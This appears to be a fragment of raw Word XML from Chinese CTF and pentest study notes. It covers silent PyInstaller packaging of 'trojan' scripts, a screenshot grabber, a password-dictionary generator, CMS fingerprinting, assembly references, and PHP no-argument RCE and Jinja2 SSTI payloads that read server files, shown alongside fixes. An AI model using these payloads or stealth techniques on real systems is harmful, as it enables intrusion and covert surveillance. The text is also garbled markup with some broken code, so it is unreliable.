            <v:imagedata r:id="rId234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233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flask import Flask, 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 = Flask(__name__)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index():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@app.route('/ip/&lt;random&gt;')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ip(random):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'192.123.10.11'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@app.route('/key/&lt;random&gt;')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key(random):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'access_token: random-' + str(time.time())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app.run(debug = True, port = 9999)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在检测IP地址端口访问的时候，可以在Dashboard中的Issue activity看到各个IP端口访问情况，可以选择全部右键选择Report issue导出文件，一直点next知道出现选择保存文件位置的时候，自己设置保存的HTML格式文件名及位置，点击保存后一直点next到结束，就可以看到保存的HTML文件了，便于查看整理信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1045" o:spt="75" type="#_x0000_t75" style="height:35pt;width:38.55pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId236" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1045" DrawAspect="Content" ObjectID="_1468075745" r:id="rId235">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3840480" cy="3459480"/>
            <wp:effectExtent l="0" t="0" r="0" b="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91180"/>
            <wp:effectExtent l="0" t="0" r="5080" b="254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/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc11261"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows基于python木马脚本开发</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63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4" w:name="_Toc6405"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）简单输出程序及静默化</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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首先打开包安装文件夹，我这里是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>C:\Users\Lenovo\AppData\Roaming\Python\Python39\Scrip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ts，在这个文件夹打开cmd，输入pyinstaller.exe -F 文件名即可打包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61310"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:docPr id="1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之后会生成dist文件夹，里面存放着生成的exe文件，cmd输入exe文件名，运行得到结果就是python脚本运行结果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792730"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1143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输入&gt;pyinstaller.exe -F 文件名 -i 图表名即可打包并将图标设置为指定图标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30350"/>
            <wp:effectExtent l="0" t="0" r="1270" b="889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输入&gt;pyinstaller.exe -F -w文件名即可打包并静默化exe，也就是双击exe会执行，但是不弹出窗口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5" w:name="_Toc15096"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）截图程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65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进行屏幕截图并在指定位置生成bmp图片</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1046" o:spt="75" type="#_x0000_t75" style="height:35pt;width:46.15pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId243" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1046" DrawAspect="Content" ObjectID="_1468075746" r:id="rId242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运行后生成截图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30" name="图片 1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screenshot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win32gui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win32ui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win32con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win32api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获取桌面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hdesktop = win32gui.GetDesktopWindow()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分辨率适应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 = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)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height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)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left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)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 = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)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desktop_dc = win32gui.GetWindowDC(hdesktop)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img_dc = win32ui.CreateDCFromHandle(desktop_dc)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创建一个内存设备描述表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 = img_dc.CreateCompatibleDC()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创建位图对象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 = win32ui.CreateBitmap()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screenshot.CreateCompatibleBitmap(img_dc, width, height)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mem_dc.SelectObject(screenshot)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截图至内存设备描述表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mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)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将截图保存到文件中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screenshot.SaveBitmapFile(mem_dc, u'C:\\Users\\Lenovo\\Desktop\\screenshot.bmp')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内存释放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mem_dc.DeleteDC()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win32gui.DeleteObject(screenshot.GetHandle())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc19569"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>python信息搜集工具开发</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/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7" w:name="_Toc23229"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）高精度字典生成</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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高精度字典生成，读取ini配置文件中带参数的正则表达式以及txt中参数值范围，之后运行得到指定条件下的高精度字典并输出的txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1047" o:spt="75" type="#_x0000_t75" style="height:35pt;width:46.65pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId246" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1047" DrawAspect="Content" ObjectID="_1468075747" r:id="rId245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8" o:spt="75" type="#_x0000_t75" style="height:35pt;width:31.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId248" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1048" DrawAspect="Content" ObjectID="_1468075748" r:id="rId247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4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50" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1049" DrawAspect="Content" ObjectID="_1468075749" r:id="rId249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50" o:spt="75" type="#_x0000_t75" style="height:35pt;width:46.65pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId252" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1050" DrawAspect="Content" ObjectID="_1468075750" r:id="rId251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exrex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#传入余个host, demo.webdic.com. 那么，demo, webdic都可能作为字典的一部分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web_white = ['com', 'cn', 'gov', 'edu', 'org', 'www']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host_para(host):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#对host进行分析，处理成想要的格式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'://'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host.split('://')[1].replace('/',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'/' in host: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host = host.replace('/', '')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host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dic_creat(hosts):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web_dics = hosts.split('.')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#取出有用的东西，如demo, webdic, 放入字典生成的地方，生成字典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#将核心的生成规则，写入配置文件，方便后期使用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f_rule = open('rule.ini', 'r', encoding='utf-8')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f_rule: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'#' != i[0]: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rule = i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 = open('pass_1.txt', 'w')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web_dic in web_dics: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web_dic not in web_white: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f_pass = open('pass_0.txt', 'r')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dic_pass in f_pass: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dics = list(exrex.generate(rule.format(web_dic = web_dic, dic_pass = dic_pass.strip('\n'))))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for dic in dics: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len(dic) &gt; 4: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 = open('pass_1.txt', 'a+')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f_pass_out.write(dic + '\n')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f_pass_out.close()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print(dic)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dic_creat(host_para(sys.argv[0]))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sys.exit(0)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#dic_create(host_para('demo.webdic.com'))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc11678"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）指纹识别</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68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1" o:spt="75" type="#_x0000_t75" style="height:35pt;width:50.2pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId254" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1051" DrawAspect="Content" ObjectID="_1468075751" r:id="rId25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builtwith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urllib.parse import urlparse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requests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hashlib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argparse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sys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BuiltCms(object):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__init__(self, url):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super(BuiltCms, self).__init__()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self.url = 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run(self):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#调用builtwith，识别web开发信息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self.built()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#调用识别方法，识别web的cms信息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self.cms()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result['cms'] = cms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#打印结果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 (result)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built(self):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builtwith.parse(self.url)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result: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result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{}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cms(self):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#这里要遍历指纹数据库作比较，进行页面MD5比较以及运行页面内容匹配识别，就不举例了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'cms_name_phpcms'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md5(self,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hashlib.md5(content).getdigest()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cont(self, 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re.search(regex, content):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False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 = BuiltCms('http://www.phpcms.com')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 = argparse.ArgumentParser(description = "CMS NuiltScan Ver:1.0")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paraser.add_argument("-u", "--url", metavar = "", help = "weburl address")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args = paraser.parse_args()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try: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url = args.url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not url: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print('Usage : cms.py -u http://tests.com/')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sys.exit(1)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cms = BuiltCms(url)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print('[*]Fecting CMS ...')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 = cms.run()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print('\n\t{}\n'.format(result))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print('[-]Complete')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except KeyboardInterrupt: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sys.exit(1)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69" w:name="_Toc10714"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69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0" w:name="_Toc1945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1.基本操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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查看窗口几种方式:F5、Tap、双击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弹出窗口恢复:Windows-Reset Desktop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各种窗口打开:Windows下选择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IDA View页面格式转换:右键Graph view和右键Text view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修改汇编指令:Edit-Patch program-Assmble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修改地址大小值:Edit-Patch program-Change byte...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函数改名:右键-N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导出文件:Edit-Patch-program，之后选上Create backup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显示不同格式数字:点击数字右键选择不同格式显示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查看010Editor窗口F6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1" w:name="_Toc202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2.汇编指令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71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通用数据传送指令.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 传送字或字节.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MOVSX 先符号扩展,再传送.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MOVZX 先零扩展,再传送.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 把字压入堆栈.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 把字弹出堆栈.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 把AX,CX,DX,BX,SP,BP,SI,DI依次压入堆栈.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 把DI,SI,BP,SP,BX,DX,CX,AX依次弹出堆栈.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PUSHAD 把EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI依次压入堆栈.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POPAD 把EDI,ESI,EBP,ESP,EBX,EDX,ECX,EAX依次弹出堆栈.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BSWAP 交换32位寄存器里字节的顺序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XCHG 交换字或字节.( 至少有一个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作数为寄存器,段寄存器不可作为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CMPXCHG 比较并交换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spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>作数.( 第二个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作数必须为累加器AL/AX/EAX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XADD 先交换再累加.( 结果在第一个**作数里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XLAT 字节查表转换.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── BX 指向一张 256 字节的表的起点, AL 为表的索引值 (0-255,即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0-FFH); 返回 AL 为查表结果. ( [BX+AL]-&gt;AL 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IN I/O端口输入. ( 语法: IN 累加器, {端口号│DX}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OUT I/O端口输出. ( 语法: OUT {端口号│DX},累加器 )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输入输出端口由立即方式指定时, 其范围是 0-255; 由寄存器 DX 指定时,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其范围是 0-65535.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目的地址传送指令.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LEA 装入有效地址.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LEA DX,string ;把偏移地址存到DX.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LDS 传送目标指针,把指针内容装入DS.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LDS SI,string ;把段地址:偏移地址存到DS:SI.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LES 传送目标指针,把指针内容装入ES.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LES DI,string ;把段地址:偏移地址存到ES:DI.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LFS 传送目标指针,把指针内容装入FS.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LFS DI,string ;把段地址:偏移地址存到FS:DI.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LGS 传送目标指针,把指针内容装入GS.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LGS DI,string ;把段地址:偏移地址存到GS:DI.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LSS 传送目标指针,把指针内容装入SS.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例: LSS DI,string ;把段地址:偏移地址存到SS:DI.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标志传送指令.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LAHF 标志寄存器传送,把标志装入AH.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SAHF 标志寄存器传送,把AH内容装入标志寄存器.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PUSHF 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POPF 标志出栈.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PUSHD 32位标志入栈.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19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>POPD 32位标志出栈.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2" w:name="t1"/>
      <w:bookmarkEnd w:id="72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ADD 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"https://so.csdn.net/so/search?q=ADC&amp;spm=1001.2101.3001.7020"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ADC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 带进位加法.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INC 加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AAA 加法的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"https://so.csdn.net/so/search?q=ASCII%E7%A0%81&amp;spm=1001.2101.3001.7020"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ASCII码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DAA 加法的十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"https://so.csdn.net/so/search?q=%E8%BF%9B%E5%88%B6&amp;spm=1001.2101.3001.7020" \t "https://blog.csdn.net/Jailman/article/details/_blank"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5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进制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SUB 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SBB 带借位减法.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DEC 减 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NEC 求反(以 0 减之).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 比较.(两**作数作减法,仅修改标志位,不回送结果).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AAS 减法的ASCII码调整.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DAS 减法的十进制调整.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MUL 无符号乘法.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IMUL 整数乘法.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以上两条,结果回送AH和AL(字节运算),或DX和AX(字运算),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AAM 乘法的ASCII码调整.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DIV 无符号除法.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IDIV 整数除法.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以上两条,结果回送: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商回送AL,余数回送AH, (字节运算);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或 商回送AX,余数回送DX, (字运算).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AAD 除法的ASCII码调整.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CBW 字节转换为字. (把AL中字节的符号扩展到AH中去)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 字转换为双字. (把AX中的字的符号扩展到DX中去)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CWDE 字转换为双字. (把AX中的字符号扩展到EAX中去)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CDQ 双字扩展. (把EAX中的字的符号扩展到EDX中去)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3" w:name="t2"/>
      <w:bookmarkEnd w:id="73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AND 与运算.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OR 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XOR 异或运算.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NOT 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TEST 测试.(两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作数作与运算,仅修改标志位,不回送结果).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逻辑左移.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SAL 算术左移.(=SHL)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SHR 逻辑右移.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SAR 算术右移.(=SHR)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ROL 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ROR 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RCL 通过进位的循环左移.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RCR 通过进位的循环右移.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以上八种移位指令,其移位次数可达255次.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移位一次时, 可直接用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作码. 如 SHL AX,1.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移位&gt;1次时, 则由寄存器CL给出移位次数.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 MOV CL,04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SHL AX,CL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4" w:name="t3"/>
      <w:bookmarkEnd w:id="74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DS:SI 源串段寄存器 :源串变址.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ES:DI 目标串段寄存器:目标串变址.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CX 重复次数计数器.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AL/AX 扫描值.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D标志 0表示重复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作中SI和DI应自动增量; 1表示应自动减量.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Z标志 用来控制扫描或比较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作的结束.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MOVS 串传送.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MOVSB 传送字符. MOVSW 传送字. MOVSD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CMPS 串比较.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CMPSB 比较字符. CMPSW 比较字.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SCAS 串扫描.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把AL或AX的内容与目标串作比较,比较结果反映在标志位.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LODS 装入串.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把源串中的元素(字或字节)逐一装入AL或AX中.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LODSB 传送字符. LODSW 传送字. LODSD 传送双字.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STOS 保存串.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是LODS的逆过程.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 当CX/ECX&lt;&gt;0时重复.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REPE/REPZ 当ZF=1或比较结果相等,且CX/ECX&lt;&gt;0时重复.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REPNE/REPNZ 当ZF=0或比较结果不相等,且CX/ECX&lt;&gt;0时重复.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REPC 当CF=1且CX/ECX&lt;&gt;0时重复.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REPNC 当CF=0且CX/ECX&lt;&gt;0时重复.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bookmarkStart w:id="75" w:name="t4"/>
      <w:bookmarkEnd w:id="75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1&gt;无条件转移指令 (长转移)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JMP 无条件转移指令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 过程调用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RET/RETF过程返回.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2&gt;条件转移指令 (短转移,-128到+127的距离内)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( 当且仅当(SF XOR OF)=1时,OP1&lt;OP2 )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JA/JNBE 不小于或不等于时转移.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JAE/JNB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JB/JNAE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JBE/JNA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以上四条,测试无符号整数运算的结果(标志C和Z).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JG/JNLE 大于转移.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JGE/JNL 大于或等于转移.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JL/JNGE 小于转移.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JLE/JNG 小于或等于转移.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以上四条,测试带符号整数运算的结果(标志S,O和Z).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JE/JZ 等于转移.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JNE/JNZ 不等于时转移.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 有进位时转移.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JNC 无进位时转移.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JNO 不溢出时转移.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JNP/JPO 奇偶性为奇数时转移.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JNS 符号位为 “0”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JO 溢出转移.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JP/JPE 奇偶性为偶数时转移.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JS 符号位为 “1” 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3&gt;循环控制指令(短转移)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 CX不为零时循环.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LOOPE/LOOPZ CX不为零且标志Z=1时循环.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LOOPNE/LOOPNZ CX不为零且标志Z=0时循环.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JCXZ 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JECXZ ECX为零时转移.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 中断指令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INTO 溢出中断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IRET 中断返回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5&gt;处理器控制指令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HLT 处理器暂停, 直到出现中断或复位信号才继续.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WAIT 当芯片引线TEST为高电平时使CPU进入等待状态.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ESC 转换到外处理器.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LOCK 封锁总线.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NOP 空**作.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STC 置进位标志位.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CLC 清进位标志位.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CMC 进位标志取反.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STD 置方向标志位.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CLD 清方向标志位.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STI 置中断允许位.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CLI 清中断允许位.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bookmarkStart w:id="76" w:name="t5"/>
      <w:bookmarkEnd w:id="76"/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define 定义一个标识符来表示变量.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registersymbol是注册符号,注册之后可以用名称代替地址.例如alloc(newmem1,1024)后调用registersymbol(newmem1)，然后在CE表里输入newmem1就会指向newmem1的起始地址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unRegistersymbol(newmem1)取消注册符号.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createthread(th1)创建线程启动.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 定义字(2字节).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PROC 定义过程.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ENDP 过程结束.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SEGMENT 定义段.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ASSUME 建立段寄存器寻址.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ENDS 段结束.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END 程序结束.</w:t>
      </w:r>
      <w:bookmarkStart w:id="77" w:name="t6"/>
      <w:bookmarkEnd w:id="7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内存申请相关的函数主要有 alloca,calloc,malloc,free,realloc,sbrk等，malloc()和calloc()都可以用来动态分配内存空间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malloc()函数有一个参数,即要分配的内存空间的大小: void *malloc(size_t size);.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calloc()函数有两个参数,分别为元素的数目和每个元素的大小,这两个参数的乘积就是要分配的内存空间的大小。void *calloc(size_t numElements, size_t sizeOfElement).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dealloc(name)释放内存.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ret//重置地址.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db定义字节类型变量，一个字节数据占1个字节单元，读完一个，偏移量加1.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dw定义字类型变量，一个字数据占2个字节单元，读完一个，偏移量加2.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dd定义双字类型变量，一个双字数据占4个字节单元，读完一个，偏移量加4.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LABEL(KB)定义大小属性.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78" w:name="_Toc1272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3.ASCII码表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78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3150" cy="3981450"/>
            <wp:effectExtent l="0" t="0" r="3810" b="11430"/>
            <wp:docPr id="124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 descr="IMG_25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79" w:name="_Toc3617"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通防</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79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0" w:name="_Toc2144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1.PWN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80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使用，将题目文件放在evilPatcher下的test文件夹，在evilPatcher文件夹打开cmd输入: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python evilPatcher.py test/文件名 sandboxs/mini_sandbox.asm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之后在test文件夹会发现打好补丁的文件名.patch文件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3124835"/>
            <wp:effectExtent l="0" t="0" r="5715" b="14605"/>
            <wp:docPr id="131" name="图片 131" descr="屏幕截图 2023-07-11 21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07-11 2105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0500" cy="1956435"/>
            <wp:effectExtent l="0" t="0" r="2540" b="952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1" w:name="_Toc1457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2.PHP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81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52" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:39.05pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId259" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1052" DrawAspect="Content" ObjectID="_1468075752" r:id="rId258">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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2" w:name="_Toc21304"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web代码审计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82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3" w:name="_Toc897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1.PHP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83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基础函数：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localeconv()函数：用于获取本地信息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current()函数：一个数组指针函数,用于获取当前指针所在位置的元素值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scandir()函数：获取当前文件目录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var_dump()函数：显示关于一个或多个表达式的结构信息，包括表达式的类型与值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array_flip(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)函数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用于反转/交换数组中的键名和对应关联的键值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array_rand()函数：随机获取数组元素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SQL注入漏洞防御：在存在漏洞的参数上使用addslash()方法：例如$username = addslashes($username);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WAF过滤缺失漏洞：存在WAF没有过滤的关键字符，例如!preg_match("/\'|http|\"|\`|cookie/", $str);变为!preg_match("/\'|http|\"|&lt;|&gt;|\`|cookie/", $str);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反序列化无参RCE攻击：无参RCE模板：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写文件进服务器：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var_dump(scandir(current(localeconv())));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随机读取服务器文件内容：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 var_dump(readfile(array_rand(array_flip(scandir(current(localeconv()))))));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Xerte文件读取exp：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3" o:spt="75" type="#_x0000_t75" style="height:35pt;width:37pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId261" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1053" DrawAspect="Content" ObjectID="_1468075753" r:id="rId260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Xerte文件上传exp：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4" o:spt="75" type="#_x0000_t75" style="height:35pt;width:42.6pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId263" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1054" DrawAspect="Content" ObjectID="_1468075754" r:id="rId262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函数中md5(a) === md5(b)绕过：只需要将参数a、b的初始化代码写在一行即可绕过，因为函数输出信息都在同一行。例如：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$x = new Error($s, 1); $y = new Error($s, 2);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file_get_content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数：读取文件，例如：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file_get_content('/flag')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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PHP版本查看：F12之后在header（标头）中查看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73675" cy="3509010"/>
            <wp:effectExtent l="0" t="0" r="14605" b="11430"/>
            <wp:docPr id="1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addslash绕过：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使用urlencode()函数，例如：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2948940" cy="1356360"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="19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之后传参：?参数名={上面的结果}即可查看信息：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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="821690"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="1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$str .=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：代表吧a拼接在字符串str后面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获取get、posts所有参数：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foreach($_POST as $key =&gt; $value) {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$str.=$value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foreach($_GET as $key =&gt; $value) {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$str.=$value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结束函数：die('no')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正则表达式：preg_match("/".$pattern."/i",$str)：/i代表无视大小写进行匹配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4" w:name="_Toc8893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2.Python</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84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SSTI漏洞防御：将存在漏洞的参数传递上使用双大括号方式传参：例如 template = 'Good Job %s!' % name变为template = 'Good Job {{name}}!'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SSTI漏洞攻击：当前文件：{{url_for['__glob'+'als__']['os']['popen']('cat *')['read']()}}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flag文件：{{url_for['__glob'+'als__']['os']['popen']('cat /flag')['read']()}}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('__glob'+'als__'：因为存在黑名单过滤，实际上也就是'__globals__'，代表文件操作协议。'os'：程序与操作系统进行交互的接口。'popen'：打开文件。'cat *'：读取当前页面的文件内容。'read'：读操作)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unquote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(url)：对参数进行url解码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str(string)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：将string参数转换为字符串类型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5" w:name="_Toc1324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3.Java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85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fastjson漏洞防御：版本如果低于1.2.83则存在漏洞，将pom.xml中版本升级为1.2.83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tomcat配置漏洞，更改tomcat-users.xml文件用户名密码即可修复</w:t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86" w:name="_Toc3064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4.Nginx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86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服务一般在：/etc/nginx/sites-enabled，如果路由存在location后路径最后不带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，即存在目录穿越漏洞，修复在最后补上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即可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危险请求：类似这行：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>dav_methods PUT DELETE MKCOL COPY MOVE;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修复删除这行代码即可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7" w:name="_Toc4627"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Diresearch</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87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在diresearch文件夹下打开cmd，输入python dirsearch.py -u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即可扫描该地址下所有页面信息，比御剑好用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55315"/>
            <wp:effectExtent l="0" t="0" r="4445" b="14605"/>
            <wp:docPr id="1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8" w:name="_Toc28315"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一句话木马</w:t>
      </w:r>
